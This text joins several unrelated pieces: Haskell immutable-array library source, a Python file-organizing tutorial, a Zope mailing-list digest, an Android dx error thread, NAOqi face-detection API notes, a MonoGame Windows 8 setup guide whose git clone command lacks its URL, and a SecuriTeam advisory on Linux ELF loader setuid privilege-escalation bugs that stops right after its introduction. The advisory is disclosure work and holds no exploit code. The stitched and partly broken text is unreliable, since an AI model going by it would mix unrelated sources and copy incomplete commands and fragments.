{-| Takes an array and a list of pairs and returns an array identical to
the left argument except that it has been updated by the associations in
the right argument. For most array types this operation is linear in the
size of the array, but the 'Data.Array.Diff.DiffArray' type provides this
operation with complexity linear in the number of updates.
-}
(//) :: (IArray a e, Ix i) => a i e -> [(i, e)] -> a i e
arr // ies = case bounds arr of
    (l,u) -> unsafeReplace arr [(index (l,u) i, e) | (i, e) <- ies]

{-# INLINE accum #-}
{-| @accum f@ takes an array and an association list and accumulates
pairs from the list into the array with the accumulating function @f@.
Thus 'accumArray' can be defined using 'accum':

> accumArray f z b = accum f (array b [(i, z) | i \<- range b])
-}
accum :: (IArray a e, Ix i) => (e -> e' -> e) -> a i e -> [(i, e')] -> a i e
accum f arr ies = case bounds arr of
    (l,u) -> unsafeAccum f arr [(index (l,u) i, e) | (i, e) <- ies]

{-# INLINE amap #-}
-- | Returns a new array derived from the original array by applying a
-- function to each of the elements.
amap :: (IArray a e', IArray a e, Ix i) => (e' -> e) -> a i e' -> a i e
amap f arr = case bounds arr of
    (l,u) -> unsafeArray (l,u) [(i, f (unsafeAt arr i))
                               | i <- [0 .. rangeSize (l,u) - 1]]

{-# INLINE ixmap #-}
-- | Returns a new array derived from the original array by applying a
-- function to each of the indices.
ixmap :: (IArray a e, Ix i, Ix j) => (i,i) -> (i -> j) -> a j e -> a i e
ixmap (l,u) f arr =
    unsafeArray (l,u) [(unsafeIndex (l,u) i, arr ! f i) | i <- range (l,u)]

-----------------------------------------------------------------------------
-- Implementation of Show instance

{-# SPECIALISE showsIArray :: (IArray a e, Ix i, Show i, Show e) => Int -> a i e -> ShowS #-}
showsIArray :: (IArray a e, Ix i, Show i, Show e) => Int -> a i e -> ShowS
showsIArray p a =
    showParen (p > 9) $
    showString "array " .
    shows (bounds a) .
    showChar ' ' .
    shows (assocs a)

-----------------------------------------------------------------------------
-- Implementation of Eq/Ord instances

{-# INLINE eqIArray #-}
eqIArray :: (IArray a e, Ix i, Eq e) => a i e -> a i e -> Bool
eqIArray arr1 arr2 =
    case bounds arr1 of { (l1,u1) ->
    case bounds arr2 of { (l2,u2) ->
    if rangeSize (l1,u1) == 0 then rangeSize (l2,u2) == 0 else
    l1 == l2 && u1 == u2 &&
    and [unsafeAt arr1 i == unsafeAt arr2 i
        | i <- [0 .. rangeSize (l1,u1) - 1]]
    }}

{-# INLINE cmpIArray #-}
cmpIArray :: (IArray a e, Ix i, Ord e) => a i e -> a i e -> Ordering
cmpIArray arr1 arr2 = compare (assocs arr1) (assocs arr2)

{-# INLINE cmpIntIArray #-}
cmpIntIArray :: (IArray a e, Ord e) => a Int e -> a Int e -> Ordering
cmpIntIArray arr1 arr2 =
    case bounds arr1 of { (l1,u1) ->
    case bounds arr2 of { (l2,u2) ->
    if rangeSize (l1,u1) == 0 then
        if rangeSize (l2,u2) == 0 then EQ else LT
    else if rangeSize (l2,u2) == 0 then GT
    else case compare l1 l2 of
             EQ    -> foldr cmp (compare u1 u2)
                            [0 .. rangeSize (l1, min u1 u2) - 1]
             other -> other
    }}
  where
    cmp i rest = case compare (unsafeAt arr1 i) (unsafeAt arr2 i) of
        EQ    -> rest
        other -> other

{-# RULES "cmpIArray/Int" cmpIArray = cmpIntIArray #-}
http://hackage.haskell.org/package/ArrayRef-0.1.3/docs/src/Data-ArrayBZ-Internals-IArray.html
Hello,

So this one is a real quick Python script that is surely gonna save a lot of time. We will be able to declutter any folder and move particular files (based on the file extension) to any destination folder that you want. This is just a basic script, and a lot of features can be added to it.

Okay, let’s start this tutorial:

- So first of all, we need to import some modules to go further.

import os
import shutil
from pathlib import Path

The os module is a very useful module that provides operating-system-related functions for creating or removing a directory or file, checking the current directory, changing it, etc. shutil is also a powerful module that lets you perform high-level file operations, such as copying, moving, and removing files and folders. The pathlib module lets you work with filesystem paths; it represents paths as objects, an object-oriented approach.

- In this tutorial, I have used my “Downloads” folder to declutter; you can use any folder and give the path to it.

downloads_path = str(Path.home() / "Downloads")
# print(os.path.isdir(downloads_path))
# You can print the path, just to make sure that the path you have given is working and you are good to go ahead.

Note: You can even get to the home directory with the os module itself. For that, the code will look like this:

from os.path import expanduser
home = expanduser("~")

- Just set the sourcepath and sourcefiles variables. This will fix your source folder and list all the files present there.

sourcepath = downloads_path
sourcefiles = os.listdir(sourcepath)

- Now we have to make a destination folder to which our files from the source folder will get moved.
# give the path where you want your destination folder to be
path = "F:\\TECHBIT\\songs"

# mkdir for making a directory
os.mkdir(path)

# setting the destination path to the path where we just made a new folder
destinationpath = path

- Lastly, we have to loop over all the files in the source folder. You can pass multiple arguments here to customize the code according to your need. I need to move my “.mp3” files from the “Downloads” folder to a folder named “songs” in my F drive. So accordingly, I chose the file type as “.mp3”.
- os.path.join first joins the source path and the file name, and then shutil.move moves each file with the “.mp3” file type to the destination path.

for file in sourcefiles:
    if file.endswith('.mp3'):
        shutil.move(os.path.join(sourcepath, file), os.path.join(destinationpath, file))

**You can run the same code for any file extension, just replace the “.mp3” with your desired file extension.

Here’s the complete code with the pathlib module:

import os
import shutil
from pathlib import Path

downloads_path = str(Path.home() / "Downloads")
sourcepath = downloads_path
sourcefiles = os.listdir(sourcepath)

path = "F:\\TECHBIT\\songs"
os.mkdir(path)
destinationpath = path

for file in sourcefiles:
    if file.endswith('.mp3'):
        shutil.move(os.path.join(sourcepath, file), os.path.join(destinationpath, file))

Alternatively, you can just use the os module and shutil. It will work just the same. Here’s the complete code for that:

import os
import shutil
from os.path import expanduser

home = expanduser("~")
sourcepath = home
sourcefiles = os.listdir(sourcepath)

path = "F:\\TECHBIT\\songs2"
os.mkdir(path)
destinationpath = path

for file in sourcefiles:
    if file.endswith('.mp3'):
        shutil.move(os.path.join(sourcepath, file), os.path.join(destinationpath, file))

That’s all for now. I hope it will help you somewhere and it was worth your time.
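The loop above generalises to several file types at once. Below is a sketch of that idea; the extension-to-folder mapping and folder names are made-up examples, and os.makedirs(..., exist_ok=True) is used so the script does not crash when a destination folder already exists (os.mkdir raises FileExistsError in that case):

```python
import os
import shutil

# Example mapping only -- adjust extensions and folder names to taste.
DESTINATIONS = {
    ".mp3": "music",
    ".jpg": "images",
    ".pdf": "documents",
}

def organize(source, target_root):
    """Move files from `source` into per-extension folders under `target_root`."""
    for name in os.listdir(source):
        ext = os.path.splitext(name)[1].lower()
        if ext in DESTINATIONS:
            dest = os.path.join(target_root, DESTINATIONS[ext])
            os.makedirs(dest, exist_ok=True)  # no error if the folder exists
            shutil.move(os.path.join(source, name), os.path.join(dest, name))
```

Calling organize(downloads_path, "F:\\TECHBIT") would then sort songs, pictures and PDFs in one pass, leaving unmatched files where they are.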
Do share your feedback and also your approach to the same problem.
https://techbit.in/programming/python-script-to-easily-organize-files-folders-and-save-time/
[Zope] Single html checkbox as list? Hi, Re: [Zope] Single html checkbox as list? +---[ [EMAIL PROTECTED] ]-- | Hi, ... | Is there a way to force the variable to be a list, even if only one | checkbox is selected? | name="foo:list" will force it to be a list. -- Totally Holistic Enterprises Internet| P:+61 7 3870 0066 | Andrew Milton The Re: [Zope] Single html checkbox as list? just do something like: input type="checkbox" name="yourname:list" good luck Jerome ALET - [EMAIL PROTECTED] - Faculte de Medecine de Nice - - Tel: 04 93 37 76 30 28 Avenue de Valombrose - 06107 NICE Cedex 2 - FRANCE On Mon, 25 Sep 2000 Re: [Zope] Use of the :records variable type and ZSQL methods Error Type: Bad Request Error Value: ['Field1', 'Field2'] Here is the code I used and sqlTest is the ZSQL Method that just inserts the two fields into a test DB: dtml-in testlist dtml-call sqlTest /dtml-in What am I doing wrong? you'll have to feed a named argument to your Zsql [Zope] Data.fs problem!!! Hi, I've some problems with my Zope database! I don't know what I've done wrong, but the only thing I did was installing the beta of MP. After the installation everything was still normal. Then I wanted to shutdown Zope and restard it in debug mode. Restarting in debug gave an error, but zope Re: [Zope] What options exist for dealing with tracebacks? I would love it if I could set some debug environment variable, run with -D="[EMAIL PROTECTED]" or subclass some Error class and have tracebacks mailed to me. I wouldn't even care about the flood of email. At least I'd have all the inputs. Although Didier Georgieff has given a thorough [Zope] Can't export only an ObjectManager Andy McKay wrote: How do I export a folder using the Import/Export tab with exporting all the subobjects? You do mean 'wihout', don't you? (Stupidest suggestion so far: delete all subjects, export, undelete) That's the only way I can think of... 
A patch that added a checkbox and a little Re: [Zope] HTML Widgets, In-place editing in Zope Phill Hugo wrote: Cool :-) widgets is an external method which will be on Zope.org next week if all goes well. Looking forward to it... cheers, Chris ___ [Zope] Error shouldn't be appended :-S Skip Montanaro wrote: Having only recently upgraded from Zope 2.0 to 2.2.1 I see that the default behavior for traceback reporting is still to embed them in an HTML comment (or display them when debugging). Yeah, and in production mode it sticks it after the end of your /html ...which [Zope] Not Patch to let Authorized Exceptions use standard_error_message ;-) Andy [Zope] How to apply arbitrary methods to objects? Hi, I'm trying to create an inline interface to manage_edit. If a user is authenticated, instead of seeing the default views of each snippet of content, they get a textarea with a submit button for each snippet. I'm still new to all this, so I'm not sure how I should be going about it: a [Zope] Help: Zope2 all threads frozen... Hello, I have zope2.2 with whats look like all thread frozen(on linux, using zserver). Netstat reports a lot of connections ESTABLISHED or CLOSE_WAIT to the zope port. Of course zope is not responding. Who to solve this (of course I can kill+restart), is it possible to set a connection timeout [Zope] Fulltext Searching? Newbies Problems with ZCatalog... Hi, well, I have added a ZCatalog and ZSearch Interface, searching for id,title etc. works perfect, but - how can I do fulltext-searches with ZCatalog? MfG / best regards, Peer Dicken IMD GmbH Softwareentwicklung Unternehmensberatung Edisonstr. 1 59199 Bönen Tel.: +49 23 83 - [Zope] Guess Who . . . . . . has a opening posted on their Web Site for a C/C++ programmer with Zope / Python experience? Email Software Engineer (CA-K23137) Category: Software Location: CA Division: Other Divisions Work as a part of a small team Re: [Zope] What options exist for dealing with tracebacks? 
John Although Didier Georgieff has given a thorough reply, I couldn't John resist a quick plug... ;-) John John which has info on using and customising error pages, including John e-mailing of errors. Thanks, [Zope] Why no full Zope? Skip Montanaro wrote: Thanks, interesting, but in my case, probably not immediately useful. It slipped my mind when posting that I need to qualify all my zope posts with, "I'm not using full-blown Zope. I only use ZServer + DocumentTemplates." Still, knowing that there is some mechanism for [Zope] ImportExportFavorites Hi guys i've got a small prob. I have the ImportExportFavorites util from microsoft. If that util post the bookmarks of an user then it sends with http_user_agent "FAVORITES" and file name "img.fav" Is there a way that zope get this file so I can save it in the ZODB. The source for [Zope] Help - Weird stuff. Hi all, Sorry for the subject but I don't really know how to describe this. I have a folder 'hp' which has loads of stuff in it, if I try to copy and paste into it though I get this error: 'The object index_html does not support this operation ' with this traceback: Traceback (innermost [Zope] ZWiki RecentChanges don't work in Zope 2.2.x ...you [Zope] personal portal and Palm syncronization I was building a personal site to weblog my engineering and personal stuff (based on Squishdot and Event Folder), and the thought occurred to me that it would be really neat if I could syncronize my Palm to this personal site. Using the Event Folder, I have a calendar, Squishdot provides the [Zope] Re: Why no full Zope? Chris Why not just use all of Zope and be done with it? That's *much* easier said than done as far as I can tell. I am maintaining long-lived web site ( five years old), which is a mixture of flat html files, CGI scripts, ZServer-published methods and XML-RPC. On the middle end, we use an [Zope] WorldPilot has the bits... [EMAIL PROTECTED] wrote: Any ideas how the sync would be done? 
WorldPilot has the ability to do this, allegedly. Might be a good starting point... cheers, Chris ___ Zope maillist - [EMAIL PROTECTED] Re: [Zope] ZWiki RecentChanges don't work in Zope 2.2.x On Mon, Sep 25, 2000 at 04:14:03PM +0100, Chris Withers wrote: ...you get an authorization error :-( This is because this Wiki isn't (and shouldn't) be publicly viewable or editable. So, Anonymous doesn't have 'View' permission on the folder. I've given Anonymous 'Access Contents Re: [Zope] personal portal and Palm syncronization Yes, this has been on my wish list for some time, but there's no way I'm going to get round to it right now... Take a look at pilot-link () for interfaces to the mail, todo, etc software on your palm. This will only really deal with workstation - palm Re: [Zope] Cookie pointer. Since cookies have been brought up, I tried the following code (Using Steve's example): dtml-if expr="RESPONSE.setCookie('name', 'value', path='/', expires=( ZopeTime() + (1.0/102.0) )" "You have cookies enabled" dtml-else "Your browser does not support cookies" /dtml-if The cookie [Zope] Newbie Tree Tag Help I am trying to implement a dtml-tree setup that will read from a set of folders that I have placed a the top level of my portal folder structure. I want to be able to call this method from other branches in the portal and have it always display the tree using the set of folders I have set up [Zope] Re: Can't export only an ObjectManager Yes sorry I mean without (Friday afternoon y'know) A hack is my best bet. Sigh. - Original Message - From: "Chris Withers" [EMAIL PROTECTED] To: "Andy McKay" [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Sent: Monday, September 25, 2000 2:42 AM Subject: Can't export only an ObjectManager Re: [Zope] ZWiki RecentChanges don't work in Zope 2.2.x what Martijn said (thanks Martijn). Another quick workaround mentioned on ZWikiProblems: you could remove the calls to getSize and similar attributes from your recentchanges page. 
Then Access Contents Information should be sufficient. -Simon ___ [Zope] Redirect FTP access on a role basis Is it possible to redirect FTP access to subfolders depending on user's role? If yes, how can I do that? I would like to have connect to the graphics folder "/gfx", if an account with a "Designer role" connects to the server in order to upload/exchange graphics. His account [Zope] still problems w/ SiteAccess 2.0.0b3 Hi, After struggling with Zope 2.2.1 + SiteAccess 2.0.0b3 upgraded from Zope 2.1.6, I gave up: I purged the previous installation and started from scratch. Now I have a strange scenario: SiteAccess is installed and I can see SiteRoot and Set Access Rule in the popup menu but [Zope] RE: Stability problems using ZOracleDA hi, we were suffering from the same problem, but now it works. when you use ZOracleDA, be sure not to use DCOracle, which ships with it. There's a newer version on the Zope site. Use the new one instead and everything will be fine. Our systems admin told me that he also modified either Re: [Zope] Authentication problem when accessing ZSQL method steve smith writes: I am experiencing great frustration when trying to implement a drop-down list based upon one of the how-tos I found on the Zope site. Whenever I try to 'view' the DTML method which references the ZSQL method, I am prompted to authenticate by my browser. I can't see Re: [Zope] Set access rule On Mon, Sep 25, 2000 at 01:52:26PM -0300, Mario Olimpio de Menezes wrote: I did an upgrade last week, from zope 2.1.6 to 2.2.1, using Debian packages. Almost everything was correct, but site access no longer works. Zope 2.2 requires SiteAccess 2 to work. SiteAccess 1 will not Re: [Zope] Nasty subtle security bug - Me Too collector, but posted to the [Zope] Nasty subtle security bug Hi Re: [Zope] Nasty subtle security bug - Me Too Brad Clements wrote: Re: [Zope] Authentication problem when accessing ZSQL method Dieter Maurer wrote: authenticate by my browser. 
I can't see anything in the security attributes for the SQL method which requires authentication, and I can 'test' the ZSQL method succesfully without requiring authentication. You must grant the "use database methods" to "Annonymous".

[Zope] Zope.org FYI
Zope.org has been having some problems with memory leaks and "ghosts". Please excuse the occasional interruption. Also, /Members is now a new kind of BTreeFolder. An update to the BTreeFolder product will soon be released. With this change, some DTML installed on zope.org may have problems if

Re: [Zope] Nasty subtle security bug - Me Too

[Zope] Re: Download Problem
Suzette Ramsden wrote: I have had this same problem downloading squishdot zip files and I don't know if it is something I am doing. When I attempt to unzip the file, I keep getting: "error reading header after processing 0 entries" What archiver are you using? I'm guessing you're talking

Re: [Zope] multiple ZOPE
... We host zope using mutliple installations of zope. It is better this way because then the clients can control which products they have installed, they can tweak their products without bothering anyone else, they can stop and restart zope whenever they please...they basically have full control.

[Zope] displaying based on date
Hi everyone,

Re: [Zope] Cookie pointer.
TMGB wrote: Since cookies have been brought up, I tried the following code (Using Steve's example): I cannot use this code in a GUF/docLogin. I get the error: "Unauthorized You are not authorized to access ZopeTime." What can I do so this code works? []s -- César A. K. Grossmann [EMAIL

RE: [Zope] Cookie pointer.
-Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On Behalf Of Cesar A. K. Grossmann Sent: Monday, September 25, 2000 5:06 PM To: TMGB Cc: Zope@Zope.Org Subject: Re: [Zope] Cookie pointer. TMGB wrote: Since cookies have been brought up, I tried the

Re: [Zope] displaying based on date

Re: [Zope] Cookie pointer.
Steve Drees wrote: What can I do so this code works? Can you cut and paste the offending code? Exactly the same as the message of Thomas: dtml-if expr="RESPONSE.setCookie('name', 'value', path='/', expires=(ZopeTime() + (1.0/102.0))" "You have cookies enabled" dtml-else "Your

[Zope] How to automatically document a Zope site?
I'm looking for a product, how-to or suggestions on how to document a zope site. Basically I just want to walk the tree of objects and output a nicely formatted series of pages that list the object, type, title, modification time, etc.. Anyone got something ready made? Brad Clements,

Re: [Zope] How to automatically document a Zope site?
No, although if you take a look at the way SQL Methods generate the dropdown "connection list", you'll get a good understanding of how to walk a tree of objectmanagers... Brad Clements wrote: I'm looking for a product, how-to or suggestions on how to document a zope site. Basically I just

[Zope] RedHat site mentions Zope
Hello everyone, I just saw on the following: Features for the developer: ... "Popular web application development tools like PHP and Zope" Link: Wow, pretty cool. It is only a five bullet list! I guess Zope is

Re: [Zope] How to automatically document a Zope site?
Here's what I just whipped up in 5 minutes.. should think before posting I guess. Create Method /Document dtml-var standard_html_header dtml-var "DocumentRecurse(_.None,_,parent=Strader,indent=0)" dtml-var standard_html_footer Strader is the top Folder I want to document Then Create Method

Re: [Zope] cannot run without -D on win2000 ?
G] Favorites Hi.

[Zope-dev] Broadtree Catalog?
Chris McDonough wrote: changed on the write. This will be solved by updates to the catalog which use a new "broadtree" BTree implementation. Any idea when this will land? We've had to give up on the Catalog for the mailing list archives and go with MySQL's full text indexing :-( cheers,

[Zope-dev] How is 'retrieveItem intended to work with TTW Specialists?
Hello ZPatterns Folk. I'm trying to implement 'delagation' with a custom Specialist. The idea, (I think this is one of the goals of ZPatterns... to allow delegation of responsibility after the Framework is built...) I have: a) MarketItemManager (Python subclass of Specialist) Some of

[Zope-dev] ZCatalog : UTF-8 Chinese
HI,)

Re: [Zope-dev] ZCatalog : UTF-8 Chinese
On Mon, 25 Sep 2000, Sin Hang Kin wrote: I generate the search interface, and test it. However, the search of the index terms returns nothing. I search most entries found in the vocabulary but none works; those that work will return many unwanted results as well. What is causing this failure? What

[Zope-dev] questions on ZPatterns plugin code
I've started browsing the ZPatterns code, and here are the questions that came up for me while reading PlugIns.py... Is zope-dev a good place for this? Would somewhere in the ZPatterns wiki be better? The PlugInBase.manage_afterAdd() and manage_beforeDelete() methods dynamically check if

[Zope-dev] RE: [Zope-ZEO] Advice
But there are really two ways to do this, either of which is viable. 1. the right way ;-) 2. Code all of your logic using TTW stuff and Zope components. Use the Publisher.Test.test method to call methods of your Zope components in unit tests. Do you really

Re: [Zope-dev] RE: [Zope-ZEO] Advice
(I took the ZEO mail list out of the loop)... [Agreed. I'll CC zope-dev and I suggest we continue there.] Sorry, I phrased my question ambiguously. I meant, do you think a TTW development approach is viable for applications with a non-trivial amount of logic? Perhaps not. Not yet.

[Zope-dev] ZPatterns bug: wrong version.txt
ZPatterns ZPatterns-0-4-2a3 version.txt still reads as ZPatterns-0-4-2a2 -- Steve Alexander Software Engineer Cat-Box limited ___ Zope-Dev maillist - [EMAIL PROTECTED] ** No

[Zope-dev] Testing Zope applications (was Re: [Zope-ZEO] Advice)
Note that this conversation hasn't had anything to do with ZEO for some time, so I'm moving it over to zope-dev. Toby Dickenson wrote: (snip) I think it is really much easier to use ZPublisher/Test (which is also available as Zope.debug: import Zope Zope.debug(url) This provides

[Zope-dev] trapping undo
Is there any way in python to trap the undo event on a document? -- Robin Becker

[Zope-dev] Suggestion for better Zope error response
Suppose you have a simple form like: html form action="" method="post" City: input name="performers" type="text" Radius: input name="radius:int" type="text" input type="submit" name="submit" value="Search" /form /html and the user

Re: [Zope-dev] How is 'retrieveItem intended to work with TTW Specialists?
At 08:00 AM 9/25/00 -0500, Steve Spicklemire wrote: So my retrieve item gets called. *unfortunately* it gets called without any namespace parameter... so my retrieveItem DTML method has no way to acquire a namespace so that it can delagate to something else! So... here is what I did... I
https://www.mail-archive.com/search?l=zope@zope.org&q=date:20000925
Also, check out our Windows 8 Zone. In part 1 of this series I gave you an overview of MonoGame, an open source cross-platform implementation of the XNA namespace and class model, and how you could use that to port your existing XNA code to Windows 8. In this article, I will show you how to get your development environment set up to support your porting effort.

Note: special thanks to Dean Ellis (dellis1972), who posted a video on YouTube outlining this process. I highly recommend that you view Dean's video as well as follow the steps below.

Developer System Requirements

Install in this order.

NOTE: I encountered an installation failure when installing the Visual Studio 2010 Express for Windows Phone tools. The XNA support would fail. Aaron Stebner's directions to download and install the latest version of Games for Windows fixed the issue. Once that is installed, run the setup for Visual Studio 2010 Express for Windows Phone and all should go smoothly.

You may be wondering: why do I need Visual Studio 2010? There is a feature of XNA called the Content Pipeline, a pre-compiler step in the preparation of graphic and audio assets for use at runtime in XNA. This feature is not yet implemented in MonoGame. Therefore you need Visual Studio 2010 to pre-compile your game assets, which you then copy over into your VS2012 project. More on that step in part 3 of this blog series.

Git Setup

MonoGame is an open source project managed under Git. In order to use it you will need to fork the repository from GitHub and then create a clone in your local environment. To do that you will need an account on GitHub and a Git client. I like the GitHub for Windows client. It has a nice Metro look and feel. It will get you in the mood to develop for Windows 8.

After you install the GitHub Windows client you will have two programs available: GitHub (GUI) and Git Shell. The GitHub client is a Metro "styled" desktop application that provides a GUI interface.
Git Shell is a PowerShell-based command line interface to Git. We will use Git Shell for our purposes. There are a lot of developers who contribute to MonoGame. The Windows 8 support is being developed by Tom Spillman and James Ford of Sickhead Games as well as several other talented developers. We will be using their MonoGame fork. In particular, we will be using the develop3D branch. That is where the Windows 8 support is being submitted.

Note: If you would like to contribute to the Windows 8 implementation of MonoGame, contact Tom Spillman (requires codeplex account).

Clone the repository and initialize its submodules from Git Shell:

git clone
CD MonoGame
git submodule init
git submodule update

Copy the Visual Studio project template from

C:\Users\[you]\Documents\GitHub\MonoGame\ProjectTemplates\VisualStudio11.MonoGame.2.5\VS11MGWindowsMetroTemplate

into

C:\Users\[you]\Documents\Visual Studio 2012\Templates\ProjectTemplates\Visual C#

The MonoGame framework solution lives in

C:\Users\[you]\Documents\GitHub\MonoGame\MonoGame.Framework

The file is called: MonoGame.Framework.Windows8.sln

Now you are ready to add your XNA graphic assets and code. In part 3 of this blog series I will cover the basic format of an XNA application and my code migration experience. – bob

This article, along with any associated source code and files, is licensed under The Code Project Open License (CPOL)
http://www.codeproject.com/script/Articles/ArticleVersion.aspx?aid=445105&av=687063
When I am including the jaxp.jar, I get the following error:

trouble processing "javax/xml/XMLConstants.class": [2009-05-08 16:53:18 - TestProject] Attempt to include a core VM class in something other than a core library. It is likely that you have attempted to include the core library from a desktop virtual machine into an application, which will most assuredly not work. If you really intend to build a core library -- which is only appropriate as part of creating a full virtual machine binary, as opposed to compiling an application -- then use the "--core-library" option to suppress this error message. If you go ahead and use "--core-library" but are in fact building an application, then please be aware that your build will still fail at some point; you will simply be denied the pleasure of reading this helpful error message. [2009-05-08 16:53:18 - TestProject] 1 error; aborting [2009-05-08 16:53:18 - TestProject] Conversion to Dalvik format failed with error 1

Has anyone faced this problem? Any help will be really appreciated. I have gone through some solutions, but they were not specific.

the error you get from dx is based only on the java package names of the libs you are importing and nothing else. the message can be summarized as: if you import a library in the java.* or javax.* namespace, it's very likely that it depends on other "core" libraries that are only provided as part of the JDK, and therefore won't be available in the Android platform. it's essentially preventing you from doing something stupid, which is accurate 99% of the time when you see that message.

now, of course, just because a java package starts with java.* or javax.* does not necessarily mean that it depends on the JDK proper. it may work perfectly fine in Android. to get around the stupidity check, add the --core-library option to dx.
change the last line of $ANDROID_HOME/platform-tools/dx from

exec java $javaOpts -jar "$jarpath" "$@"

to

exec java $javaOpts -jar "$jarpath" --core-library "$@"

in my case, i was including a library that depended on Jackson, which depends on JAXB. for me, overriding the stupidity check was acceptable because the library's use of Jackson was only for JSON and not for XML serialization (i only include the JAXB API library, not the impl). of course i wish there was a cleaner way to go about this, but re-writing the top level library to avoid using Jackson was not an option.

### I see two possibilities: In your project's folder, the file .classpath could be wrong. Try to replace it with: <> If it does not work, it means the library you are trying to include is not compatible with Android.

### If you are including a core class then this error is self explanatory. If you aren't (search your code, just to make sure), then: I have seen this error from time to time, but only when using Eclipse, when the Android "library" gets added to the Eclipse build path multiple times by accident. I don't know how it gets in that state, but it has happened to me twice now. To resolve it, you need to fix the .classpath file as Nicolas noted. Another way to do that is to edit the "Java Build Path" (right click on the project and select properties) and remove your Android* libraries (if there are more than one, remove them all). This will cause the project to fail to compile and have many errors, but once you are sure you have gotten rid of all the libraries you can then right click the project again and select "Android Tools" -> "Fix Project Properties" and the correct (single copy) of Android.jar will be added back, and things should work fine again from there.

### I got this after copy-pasting an Android project into the same workspace. Deleting it from disk afterwards wasn't enough, because Eclipse still had some reference to it hidden away.
I also had to remove the following folder under the workspace folder: .metadata\.plugins\org.eclipse.core.resources.projects\[NameOfTheDuplicateProject]

### I'm not including a core class or building a core library or any of that.

yes, you are: trouble processing "javax/xml/XMLConstants.class". java.* and javax.* both count. you can use the --core-library switch if you just want to ignore this in a test app, but heed the warning: "your application will still fail to build or run, at some point. Please be prepared for angry customers who find, for example, that your application ceases to function once they upgrade their operating system. You will be to blame for this problem."

the right fix, as it says, for a shipping app, is to repackage those classes (i.e. move them to a new directory, edit their "package" lines correspondingly, and update the "import" lines in their callers).
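The package-prefix heuristic the first answer describes can be illustrated with a tiny sketch. This is a re-creation for explanation only, not dx's actual source; the function name is invented here:

```python
# Illustrative re-creation of the heuristic described above: dx flags
# any class whose JVM-internal name sits in the java.* or javax.*
# namespace, since such classes normally belong to the core JDK.
CORE_PREFIXES = ("java/", "javax/")

def is_core_class(internal_name):
    """internal_name is in JVM form, e.g. 'javax/xml/XMLConstants'."""
    return internal_name.startswith(CORE_PREFIXES)

for cls in ("javax/xml/XMLConstants", "com/example/app/Main", "java/util/List"):
    print(cls, "->", "rejected (core namespace)" if is_core_class(cls) else "ok")
```

Note that the real check inspects the class names inside the jar being dexed, which is why renaming (repackaging) the classes, as the last answer suggests, makes the error go away.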
https://throwexceptions.com/android-core-library-error-throwexceptions.html
On Tue, 17 May 2011, Ingo Molnar wrote:

> I'm not sure i get your point.

Your example was not complete as described. After an apparently simple specification, you've since added several qualifiers and assumptions, and I still doubt that it's complete. A higher level goal would look like "Allow a sandbox app access only to approved resources, to contain the effects of flaws in the app", or similar. Note that this includes a threat model (remote attacker taking control of the app) and a general and fully stated strategy for dealing with it. From there, you can start to analyze how to implement the goal, at which point you'd start thinking about configuration, assumptions, filesystem access, namespaces, indirect access (e.g. via sockets, rpc, ipc, shared memory, invocation).

Anyway, this is getting off track from the main discussion, but you asked...

- James
--
James Morris <jmorris@namei.org>
http://www.linux-mips.org/archives/linux-mips/2011-05/msg00265.html
NAOqi Vision - Overview | API | Tutorial

See also

Namespace : AL

#include <alproxies/alfacedetectionproxy.h>

Remove all learned faces from the database.

Enables/disables the face recognition process. The remaining face detection process will be faster if face recognition is disabled. Face recognition is enabled by default.

Enables/disables face tracking. Enabling tracking usually allows you to follow a face even if the corresponding person is not facing the camera anymore. However, it can lead to more false detections. When active, only one face at a time will be detected.

Delete from the database all learned faces corresponding to the specified person.

Returns whether tracking is enabled. Tracking is enabled by default.

Learn a new face and add it in the database under the specified name.

Use in a new learning process the latest images where a face has been wrongly recognized. In detail, when a face is recognized, a series of images from just before and after the recognition is kept in memory in a rolling buffer for 7 seconds. If this method is called, these images feed the learning stage in order to associate the correct name with this face. Note that if two different persons are recognized in less than 7 seconds, only the first one can be relearned.

Raised when one or several faces are currently being detected.
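The 7-second rolling buffer described above can be sketched in plain Python. The class below is an illustration of the idea only (timestamps passed explicitly for clarity); it is not part of the NAOqi API:

```python
import time
from collections import deque

class RollingFrameBuffer:
    """Keep only the frames captured within the last `window` seconds."""
    def __init__(self, window=7.0):
        self.window = window
        self.frames = deque()  # (timestamp, frame) pairs, oldest first

    def add(self, frame, now=None):
        now = time.monotonic() if now is None else now
        self.frames.append((now, frame))
        # Drop everything older than the window.
        while self.frames and now - self.frames[0][0] > self.window:
            self.frames.popleft()

    def snapshot(self):
        """Frames that would feed a re-learning pass right now."""
        return [f for _, f in self.frames]

buf = RollingFrameBuffer(window=7.0)
buf.add("frame-a", now=0.0)
buf.add("frame-b", now=5.0)
buf.add("frame-c", now=8.0)   # frame-a (t=0) is now older than 7 s
print(buf.snapshot())          # ['frame-b', 'frame-c']
```

This also makes the documented limitation visible: once older frames fall out of the window, only the most recent recognition can be corrected.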
http://doc.aldebaran.com/1-14/naoqi/vision/alfacedetection-api.html
[UNIX] Linux Kernel binfmt_elf ELF Loader Privilege Escalation
From: SecuriTeam (support_at_securiteam.com)
To: list@securiteam.com
Date: 16 Nov 2004 17:31

binfmt_elf ELF Loader Privilege Escalation
------------------------------------------------------------------------

SUMMARY

Numerous bugs have been found in the Linux ELF binary loader while handling setuid binaries. The vulnerabilities allow a malicious user the ability to exploit SUID binaries in order to gain root privileges on the system.

DETAILS

Vulnerable Systems:
* Linux kernel versions 2.4 up to 2.4.27, inclusive
* Linux kernel versions 2.6 up to 2.6.9, inclusive

On Unix-like systems the execve(2) system call provides functionality to replace the current process by a new one (usually found in binary form on the disk), or in other words to execute a new program. Internally the Linux kernel uses a binary format loader layer to implement the low level format functionality of the execve() system call. The common execve code contains just a few helper functions used to load the new binary and leaves the format specific processing to a specialized binary format loader.

One of the Linux format loaders is the ELF (Executable and Linkable Format) loader. Nowadays ELF is the standard format for Linux binaries besides the a.out binary format, which is deprecated.

One of the functions of a binary format loader is to properly handle setuid executables, that is, executables with the setuid bit set on the file system image of the executable. It allows execution of programs under a different user ID than the user issuing the execve call.

Every ELF binary contains an ELF header defining the type and the layout of the program in memory as well as additional sections (i.e. which program interpreter to load, symbol table, etc).
The ELF header normally contains information about the entry point of the binary, the position of the memory map header (phdr) in the binary image, and the program interpreter (normally the dynamic linker ld-linux.so). The memory map header defines the memory mapping of the executable file that can be seen later from /proc/self/maps.

Five different coding errors have been found in the linux/fs/binfmt_elf.c file, all lines taken from the 2.4.27 kernel source files:

* Wrong return value check while filling kernel buffers (loop to scan the binary header for an interpreter section):

